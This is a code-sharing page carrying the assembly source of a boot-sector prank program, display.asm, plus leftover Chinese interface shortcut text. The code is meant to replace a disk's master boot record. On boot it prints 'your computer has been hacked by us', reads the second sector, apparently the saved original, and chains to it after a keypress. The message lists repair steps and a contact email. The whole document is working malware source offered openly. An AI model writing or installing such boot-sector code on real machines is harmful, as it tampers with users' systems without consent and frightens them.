📄 display.asm
字号:
org 7c00h
mov ax,cs
mov ds,ax
mov es,ax
mov ax,bootmsg
mov bp,ax
mov cx,meslen
mov ax,01301h
mov bx,0004h
mov dx,0500h
int 10h
xor ax,ax
mov ss,ax
mov sp,7c00h
cld
mov si,7c2fh
mov di,062fh
push ax
push di
mov cx,01d1h
repz
movsb
retf
mov ax,0201h
mov bx,7c00h
mov cx,0002h
mov dx,0080h
int 13h
mov ah,00h
int 16h
jmp 0000:7c00h
bootmsg: db "Attention, your computer has been hacked by us."
db 0dh,0ah
db "We just make this programme for fun, but not aimed at distroy your computer system."
db 0dh,0ah
db "Solving strategy:"
db 0dh,0ah
db "1. Run our programme with the parameter -fix in the command line."
db 0dh,0ah
db "2. Run the command fdisk /mbr in DOS."
db 0dh,0ah
db "3. Copy second sector to first sector with winhex"
db 0dh,0ah
db "4. Mail to sp_52521@yahoo.com.cn."
db 0dh,0ah
db "Press any key to continue..."
meslen equ $-bootmsg
times 510-($-$$) db 0
dw 0xaa55
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -